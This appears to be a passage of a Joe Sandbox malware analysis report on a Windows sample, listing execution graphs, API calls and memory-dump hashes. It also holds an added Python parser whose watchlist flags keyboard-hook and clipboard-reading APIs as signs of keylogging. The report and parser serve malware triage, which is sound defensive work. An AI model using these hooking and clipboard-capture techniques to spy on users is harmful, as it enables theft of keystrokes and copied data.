                                            • Source File: 00000005.00000002.1829915193.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_13cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec26aa50984274029f92d04f9b734d342e1622ade37011ef8254340db1f5259a
                                            • Instruction ID: 6c35195b34fa90b329b64fd666896698a22be67c4932a8039763faa5ad404e1b
                                            • Opcode Fuzzy Hash: ec26aa50984274029f92d04f9b734d342e1622ade37011ef8254340db1f5259a
                                            • Instruction Fuzzy Hash: 2CF062724043849AE7118E1ACD84B66FFE8EB81739F18C56AFD085E286C2799844CBB1

                                            Execution Graph

                                            Execution Coverage:9.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:169
                                            Total number of Limit Nodes:18
                                             execution_graph (entry points and the API-calling nodes they reach; the intermediate nodes and edges of the original graph dump are collapsed)
                                             • 655e140 -> 655dbb0 -> 655e190 OleInitialize
                                             • 655c6f8 DuplicateHandle
                                             • 6558998 -> 6558a00 CreateWindowExW
                                             • 2f1d01c -> 655d2d2, 6558b42, 6558b50, 6556c44, which through 655d478 / 655d488, 655d958 / 655d968, 655dedf / 655df20, 655df58 / 655df68 and 655e220 / 655e230 reach 655dcc8 -> 655e2d8 OleGetClipboard; 655d2d2 -> 655c2ac -> 655d622 CallWindowProcW
                                             • 655fe28 -> 655fe6c SetWindowsHookExA
                                             • 2f60848 -> 2f61380 -> 65558e3 / 65558f8 -> 65503dc GetModuleHandleW; -> 655039c -> 6556eb1 / 6556ec0 -> 6555e54 -> 65578f0 GetModuleHandleW (also via 6557431 -> 655760f / 655769e -> 6555e54); -> 65503bc -> 655c304 -> 655d8c8 KiUserCallbackDispatcher
                                             • 65578ea -> 6557938 GetModuleHandleW
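Joe Sandbox prints the execution graph above, and each function's control-flow graph, as a flat whitespace-separated string of numeric node ids, addresses or basic-block ranges, API names and `src->dst` edges. The Python below is an added example written for this page, not Joe Sandbox code: it parses that format into nodes and edges, lists the entry points, collects the APIs reachable from each, and flags the nodes that back the "Installs a global keyboard hook" and "clipboard capturing" signatures. The grammar is inferred from the text on this page (an assumption), the WATCHLIST table is the editor's own, and the sample strings are an excerpt of this report's graphs with one constructed edge.

```python
"""Parse Joe Sandbox's flattened execution_graph / control_flow_graph text.

Added example for this report page, not Joe Sandbox code. Format assumed
from the page: graph name, then node definitions "<id> <addr>[ <label>]"
and edges "<src>-><dst>", whitespace-separated. Identifier-like label
tokens are taken as API names; anything else ("2 API calls") is a note.
"""
import re
from collections import deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")  # hex addr or block range
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")
LABEL_NOISE = {"API", "calls"}  # label words that are not API names

# Editor's own triage table (assumption, not from the report): APIs that
# back the keyboard-hook and clipboard-capture signatures.
WATCHLIST = {
    "SetWindowsHookExA": "global hook (keylogging)",
    "SetWindowsHookExW": "global hook (keylogging)",
    "OleGetClipboard": "clipboard read",
}


@dataclass
class Node:
    nid: int
    addr: str
    apis: list = field(default_factory=list)
    note: str = ""


@dataclass
class Graph:
    name: str
    nodes: dict = field(default_factory=dict)  # nid -> Node
    edges: list = field(default_factory=list)  # (src, dst) pairs


def parse_graph(text: str) -> Graph:
    toks = text.split()
    if not toks:
        raise ValueError("empty graph string")
    g, cur, i = Graph(toks[0]), None, 1
    while i < len(toks):
        t = toks[i]
        m = EDGE_RE.match(t)
        if m:
            g.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # A node is a decimal id followed by an address token; the look-ahead
        # keeps the "2" of "2 API calls" from being read as node 2.
        if NODE_ID_RE.match(t) and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            cur = Node(int(t), toks[i + 1])
            g.nodes[cur.nid] = cur
            i += 2
            continue
        if cur is None:
            raise ValueError(f"label token {t!r} before any node")
        if IDENT_RE.match(t) and t not in LABEL_NOISE:
            cur.apis.append(t)
        else:
            cur.note = f"{cur.note} {t}".strip()
        i += 1
    return g


def roots(g: Graph) -> list:
    """Node ids with no incoming edge: the graph's entry points."""
    targets = {d for _, d in g.edges}
    return sorted(n for n in g.nodes if n not in targets)


def all_apis(g: Graph) -> list:
    return sorted({a for n in g.nodes.values() for a in n.apis})


def apis_reachable_from(g: Graph, start: int) -> list:
    """APIs on every node reachable from `start` (BFS over the edges)."""
    succ = {}
    for s, d in g.edges:
        succ.setdefault(s, []).append(d)
    seen, queue, found = {start}, deque([start]), set()
    while queue:
        n = queue.popleft()
        if n in g.nodes:
            found.update(g.nodes[n].apis)
        for d in succ.get(n, ()):
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return sorted(found)


def triage(g: Graph) -> dict:
    """addr -> reason for every node whose label carries a watched API."""
    return {n.addr: WATCHLIST[a] for n in g.nodes.values()
            for a in n.apis if a in WATCHLIST}


# Excerpt of this report's execution graph; the last edge (22220->22244) is
# constructed so that a "2 API calls" label and a clipboard node are exercised.
SAMPLE_EXEC = (
    "execution_graph 22309 655e140 22310 655e14b 22309->22310 22311 655e15b "
    "22310->22311 22313 655dbb0 22310->22313 22314 655e190 OleInitialize "
    "22313->22314 22315 655e1f4 22314->22315 22315->22311 "
    "22196 655c6f8 DuplicateHandle 22197 655c78e 22196->22197 "
    "22198 6558998 22199 6558a00 CreateWindowExW 22198->22199 22201 6558abc 22199->22201 "
    "22316 655fe28 22317 655fe6c SetWindowsHookExA 22316->22317 22319 655feb2 22317->22319 "
    "22219 6558b76 22220 6556c44 2 API calls 22219->22220 "
    "22244 655d958 OleGetClipboard 22220->22244")
# One control-flow graph from the page (DuplicateHandle wrapper).
SAMPLE_CFG = ("control_flow_graph 473 143d581-143d61c DuplicateHandle "
              "474 143d625-143d642 473->474 475 143d61e-143d624 473->475 475->474")

if __name__ == "__main__":
    g = parse_graph(SAMPLE_EXEC)
    for r in roots(g):
        print(f"{g.nodes[r].addr}: {apis_reachable_from(g, r)}")
    print("triage:", triage(g))
```

Run it against the full `execution_graph` string of a report to get, per entry point, the APIs it reaches; the watchlist hits are the addresses to open first in the memory dump named under "Memory Dump Source".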
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,buq
                                            • API String ID: 0-4122549453
                                            • Opcode ID: 75a4ca2f7e03003885ce32185895e92f5cb75de831aee337f183b3c1cf1af430
                                            • Instruction ID: 404518740c691400ad3e1c856dc99670745062bc7cf7808f97b06d43b7c4aa25
                                            • Opcode Fuzzy Hash: 75a4ca2f7e03003885ce32185895e92f5cb75de831aee337f183b3c1cf1af430
                                            • Instruction Fuzzy Hash: 34332D31D107198EDB10DF68C884AADF7B1FF99300F15D69AD459AB221EB70AAC5CF81
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 092ae5d920cef03e9e539b7abc872c3f401cfe653ed5f83ec041c4a4caa4cf46
                                            • Instruction ID: ad8ee8c71a52e553415870575a68dfd413e8ed2a692497d82f35106090787c60
                                            • Opcode Fuzzy Hash: 092ae5d920cef03e9e539b7abc872c3f401cfe653ed5f83ec041c4a4caa4cf46
                                            • Instruction Fuzzy Hash: E853F831C10B1A8ACB51EF68C8845A9F7B1FF99300F51D79AE45877221FB70AAD5CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l
                                            • API String ID: 0-253765261
                                            • Opcode ID: 20a65d6b597a6ecc63872e552ebba7a2b8baaa155ad57be4da001438619bd538
                                            • Instruction ID: 993ffb55911a24f79eeab2a4710279f52714d5e3f102ddaf3646e75e1da0c1e8
                                            • Opcode Fuzzy Hash: 20a65d6b597a6ecc63872e552ebba7a2b8baaa155ad57be4da001438619bd538
                                            • Instruction Fuzzy Hash: 14917E70E00209DFDF24DFA9C9897EEBBF2EF88758F148129E514A7254EB749845CB81
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a6d1a0d976361fe687b3f96c56ca24ada6bb1e769e48a9e01aa5f9a8605abad
                                            • Instruction ID: 67da8585cca3f4e1897aa4bedb4a889b81bace22e682a17588eac413fe741832
                                            • Opcode Fuzzy Hash: 0a6d1a0d976361fe687b3f96c56ca24ada6bb1e769e48a9e01aa5f9a8605abad
                                            • Instruction Fuzzy Hash: E2B16D70E002098FDB20DFA9C9897ADBBF2FF88354F148529D915E7394EB749885CB91

                                             Control-flow Graph
                                             • 6558992-6558994 -> 6558921-6558933, 6558996-65589fe
                                             • 6558996-65589fe -> 6558a00-6558a06, 6558a09-6558a10
                                             • 6558a00-6558a06 -> 6558a09-6558a10
                                             • 6558a09-6558a10 -> 6558a12-6558a18, 6558a1b-6558a53
                                             • 6558a12-6558a18 -> 6558a1b-6558a53
                                             • 6558a1b-6558a53 -> 6558a5b-6558aba
                                             • 6558a5b-6558aba (CreateWindowExW) -> 6558abc-6558ac2, 6558ac3-6558afb
                                             • 6558abc-6558ac2 -> 6558ac3-6558afb
                                             • 6558ac3-6558afb -> 6558afd-6558b00, 6558b08
                                             • 6558afd-6558b00 -> 6558b08
                                             • 6558b08 -> 6558b09
                                             • 6558b09 -> 6558b09 (self-loop)
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06558AAA
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 91bf5d06ab62edb38fe1be53b989c65d125c36da615c47c77ee86f2823935778
                                            • Instruction ID: 7d2b33533efd907be092a7a6e16596b41ecd256ba2102ced2a55e3ef59b58708
                                            • Opcode Fuzzy Hash: 91bf5d06ab62edb38fe1be53b989c65d125c36da615c47c77ee86f2823935778
                                            • Instruction Fuzzy Hash: 6B51E2B0D00319AFDB14CF9AC894ADEBFB5FF48310F24852AE818AB250D7719845CF91

                                            Control-flow Graph (rendered graph omitted; first block 6558998, blocks span 6558998-6558b09, calls CreateWindowExW)
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06558AAA
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c438c25901cd4385c35d2a79cbaeb822e6c3774ce26f044e15e8713a55185455
                                            • Instruction ID: 9089daef6c26caeb46b2c9b70a09515de8384ef74e35aeee8c4f1476aa0faf6b
                                            • Opcode Fuzzy Hash: c438c25901cd4385c35d2a79cbaeb822e6c3774ce26f044e15e8713a55185455
                                            • Instruction Fuzzy Hash: 6141C0B1D00319DFDB14CF99C994ADEFBB5BF88310F24812AE818AB250D771A845CF90

                                            Control-flow Graph (rendered graph omitted; first block 655c2ac, blocks span 655c2ac-655d6a4, calls 6556c44 and CallWindowProcW)
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0655D649
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 9de5c6e77c4835db3e3aefa2f97c5517e2f07592235692827f6173e81b096907
                                            • Instruction ID: 2064ee9654995d30805864cb626ab7b35e7ded83c1167086571a2e828d546be6
                                            • Opcode Fuzzy Hash: 9de5c6e77c4835db3e3aefa2f97c5517e2f07592235692827f6173e81b096907
                                            • Instruction Fuzzy Hash: 384149B5A00309CFDB54CF89C488AAABBF5FF88314F25C559D519AB321C730A841CFA5

                                            Control-flow Graph (rendered graph omitted; first block 6557855, blocks span 6557855-6557980, calls GetModuleHandleW)
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0321a27db6ff94c7f1bd78608a91c96c6666d1223367ce108b6c8b32537ba3a3
                                            • Instruction ID: 5649a76f23027cf772ab636c63182a260d5e617744bbd4cb06d50c798fd7cfed
                                            • Opcode Fuzzy Hash: 0321a27db6ff94c7f1bd78608a91c96c6666d1223367ce108b6c8b32537ba3a3
                                            • Instruction Fuzzy Hash: 503189B4E007498FCB48DFAAC45469EBBF5BF89314F20846ED849A7310D775A806CFA5

                                            Control-flow Graph (rendered graph omitted; first block 655e2cc, blocks span 655e2cc-655e3d8, calls OleGetClipboard)
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 88c20aa3a06e7a03d1e9018476c540f5e4d108c469f7dd4fcc6ca98e68ba104a
                                            • Instruction ID: 0c74c4ee40ade3025eac3d2b4afd9dfcf11903ba3fd9835a4711da56b9724500
                                            • Opcode Fuzzy Hash: 88c20aa3a06e7a03d1e9018476c540f5e4d108c469f7dd4fcc6ca98e68ba104a
                                            • Instruction Fuzzy Hash: 083102B0D01248EFDB14CFA9C959BCEBBF5BF48304F218059E504AB2A0D7B4A945CFA5

                                            Control-flow Graph (rendered graph omitted; first block 655dcc8, blocks span 655dcc8-655e3d8, calls OleGetClipboard)
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 25b11d1cfdde839ca3cd3f7a79e7cff116c6255a33e38cb3f2a16375a8df955e
                                            • Instruction ID: b24fbf1cad4b25bd08378ef9c229d0aedb6a0f0ea26d7aa1e33ae6c4de098f6d
                                            • Opcode Fuzzy Hash: 25b11d1cfdde839ca3cd3f7a79e7cff116c6255a33e38cb3f2a16375a8df955e
                                            • Instruction Fuzzy Hash: A43123B0D00208DFDB10CF99C999B8DBBF5BF48304F21805AE404BB2A0D7B4A945CF95

                                            Control-flow Graph (rendered graph omitted; first block 655fe21, blocks span 655fe21-655fed9, calls SetWindowsHookExA)
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0655FEA3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: d12d3a3fa0da437b9c021d67adc761870f3ffd610ac94778f66fc91687e6e564
                                            • Instruction ID: 889341ac88ceeaa21fe12fc81c32515c618080989e0080144201e6e82dac3a6e
                                            • Opcode Fuzzy Hash: d12d3a3fa0da437b9c021d67adc761870f3ffd610ac94778f66fc91687e6e564
                                            • Instruction Fuzzy Hash: 9F2144B19002499FCB54CFA9D888BDEFFF5FB89320F14801AE859A7251C7746945CFA1

                                            Control-flow Graph (rendered graph omitted; first block 655c6f0, blocks span 655c6f0-655c7b2, calls DuplicateHandle)
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0655C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: f997efc5cc3fb255affa6bf2cb240fca0cec400467848a517ca087873dc30fb0
                                            • Instruction ID: 093196f62f844e5c66fe1ad76022928c017ae56d1a3b150974b9dc859ddce7f1
                                            • Opcode Fuzzy Hash: f997efc5cc3fb255affa6bf2cb240fca0cec400467848a517ca087873dc30fb0
                                            • Instruction Fuzzy Hash: CC21E3B5D002599FDB10CFA9D584AEEBFF5FB48310F14801AE958A7250D374A941CFA4

                                            Control-flow Graph (rendered graph omitted; first block 655c6f8, blocks span 655c6f8-655c7b2, calls DuplicateHandle)
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0655C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 10213dbe3e9bcb76f5480b276b9e045f900bb4b3665847e4a564b392af15534e
                                            • Instruction ID: ee6156ae3d5fbe1c2124c55a34835a9484222a44d7bd0c65762200cebf765010
                                            • Opcode Fuzzy Hash: 10213dbe3e9bcb76f5480b276b9e045f900bb4b3665847e4a564b392af15534e
                                            • Instruction Fuzzy Hash: DA21E0B59002189FDB10CFAAD984ADEBBF8FB48320F14801AE918A7210D374A940CFA4

                                            Control-flow Graph (rendered graph omitted; first block 655fe28, blocks span 655fe28-655fed9, calls SetWindowsHookExA)
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0655FEA3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: ffe1390d855519f21adaaa03e3db96ce3299e9b3a619a224bf941f45e1b7063f
                                            • Instruction ID: 71901400102c6519a6587fbed2d309c0082839c5877fb887d1645c964d8e2c3f
                                            • Opcode Fuzzy Hash: ffe1390d855519f21adaaa03e3db96ce3299e9b3a619a224bf941f45e1b7063f
                                            • Instruction Fuzzy Hash: 722108B5D002099FDB54DF99C848BDEFBF5FB88320F10842AD459A7250C774A945CFA5
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06557956
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: cb22af5d76ffdb6287ca103438ea66480a212165df9d71b9f1e644421360439b
                                            • Instruction ID: 3debefce52f3ff3955a7c80818d2bc590c483cb5d7b67ae99243ad59fc829da6
                                            • Opcode Fuzzy Hash: cb22af5d76ffdb6287ca103438ea66480a212165df9d71b9f1e644421360439b
                                            • Instruction Fuzzy Hash: 76112DB5C002498FCB10CF9AC848ADEFBF4EB88224F10842AD869B7200C374A545CFA5
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06557956
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 1db84d07628600eed197fea11077985ea74f6339b425792ee5694e17822353d4
                                            • Instruction ID: 5b8e5ebc86efe09dc015b25232379659d7879ab3b42e9585971bfcb21254a91a
                                            • Opcode Fuzzy Hash: 1db84d07628600eed197fea11077985ea74f6339b425792ee5694e17822353d4
                                            • Instruction Fuzzy Hash: 3C11F0B5C002498FDB10DF9AC844ADEFBF4AB89220F10845AD869B7310C375A546CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0655E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: bd5ea430e54e830abcf5432f16cd32c9bd17a0ccf2936e25472e27685b3ab4ca
                                            • Instruction ID: aedbb6e120fe5daee1ff11239e35c8f0f67b5dc1914891f80d4079b4ad71601d
                                            • Opcode Fuzzy Hash: bd5ea430e54e830abcf5432f16cd32c9bd17a0ccf2936e25472e27685b3ab4ca
                                            • Instruction Fuzzy Hash: 711145B58003488FDB20CF9AC949BDEFFF8EB48320F20845AE558A3210C374A544CFA5
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0655D89D), ref: 0655D927
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 5125a3a0e8ac92ffe9308be41f08767b1da2f108f11138cc52dbd202b245a78c
                                            • Instruction ID: 1edc2a5c144bba1dd8798df85055780e3fac515d533188934ffe1597ae9d52f1
                                            • Opcode Fuzzy Hash: 5125a3a0e8ac92ffe9308be41f08767b1da2f108f11138cc52dbd202b245a78c
                                            • Instruction Fuzzy Hash: 691103B5800249CFDB50DF9AD548BDEFBF4FB48324F20846AD959A7250C374A944CFA9
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0655E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 754a8ab9e8c204d56ad2a700c50008a378c2669dc37823c9d404addee5e0efbe
                                            • Instruction ID: a84586f57593ded17a316a0028934a7a62356312aa3c87763d362568be8fa1a3
                                            • Opcode Fuzzy Hash: 754a8ab9e8c204d56ad2a700c50008a378c2669dc37823c9d404addee5e0efbe
                                            • Instruction Fuzzy Hash: 511103B5900349CFDB20DF9AC549BDEBBF4EB48324F20845AE959A7210C374A944CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0655E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: fcae8bcff9b66bdfa6e3f36eb5188b69c19cf53268684bbce78dcd6aad8c58b4
                                            • Instruction ID: c31af338cb346d0343d554685c65b0b61ae468a4fbf2a4ad9302e1cd723adf82
                                            • Opcode Fuzzy Hash: fcae8bcff9b66bdfa6e3f36eb5188b69c19cf53268684bbce78dcd6aad8c58b4
                                            • Instruction Fuzzy Hash: 141133B59003488FDB10CF9AC949BCEBBF4AB48320F20841AE558A7210C374AA44CFA5
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0655D89D), ref: 0655D927
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 0169afdac00d39e99cc030f4b9e775fe043696de5e70c996c4c7ac81cda32593
                                            • Instruction ID: ff2ea22a62275c5118bba2d373d86d1cc93098ab23f3f94fe34447c7b503c020
                                            • Opcode Fuzzy Hash: 0169afdac00d39e99cc030f4b9e775fe043696de5e70c996c4c7ac81cda32593
                                            • Instruction Fuzzy Hash: 551103B5800249DFCB10DF9AD548BDEFBF4FB88324F20846AD958A7650C374A944CFA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l
                                            • API String ID: 0-253765261
                                            • Opcode ID: 4f421788ed2dd5d0d0c0207fc5f05f8f08b5f2e29fdd8e6e0671fc5117770ff3
                                            • Instruction ID: 618c5a11bec61e33a61fe3d4150b54e7720160084cc8adb4357dc485b50a54ed
                                            • Opcode Fuzzy Hash: 4f421788ed2dd5d0d0c0207fc5f05f8f08b5f2e29fdd8e6e0671fc5117770ff3
                                            • Instruction Fuzzy Hash: 66916D70E00209DFDB24DFA8D9897EEBBF2EF88758F148129E514A7254DB749885CF81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            • Opcode ID: a80d67f2f231f265d71f0baa38f2476d64854b37b40d976a937a8c1c86d4ed5a
                                            • Instruction ID: 841e9997774278b52d233339c9d17e8aa840739913ddfb52172a8cc81afd68c7
                                            • Opcode Fuzzy Hash: a80d67f2f231f265d71f0baa38f2476d64854b37b40d976a937a8c1c86d4ed5a
                                            • Instruction Fuzzy Hash: ED310031B003058FDB169B34D558A7E7BE2EB89A80F144829E406DB395DF39DC46C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: cfb86e7f7d305afd7c5e2d1437c95d431041d6b617e34ea9bedd607ffbc1c7c2
                                            • Instruction ID: aefc28626a5b9832952fa4eb9aaeb609975e1d03d58b1ada2fc4f8d749a7d07c
                                            • Opcode Fuzzy Hash: cfb86e7f7d305afd7c5e2d1437c95d431041d6b617e34ea9bedd607ffbc1c7c2
                                            • Instruction Fuzzy Hash: 45315C31E102099BDB15DFA5D4487AEF7B2FF85358F208525FA05EB250EB70A842CB91
                                            Strings
                                            Memory Dump Source
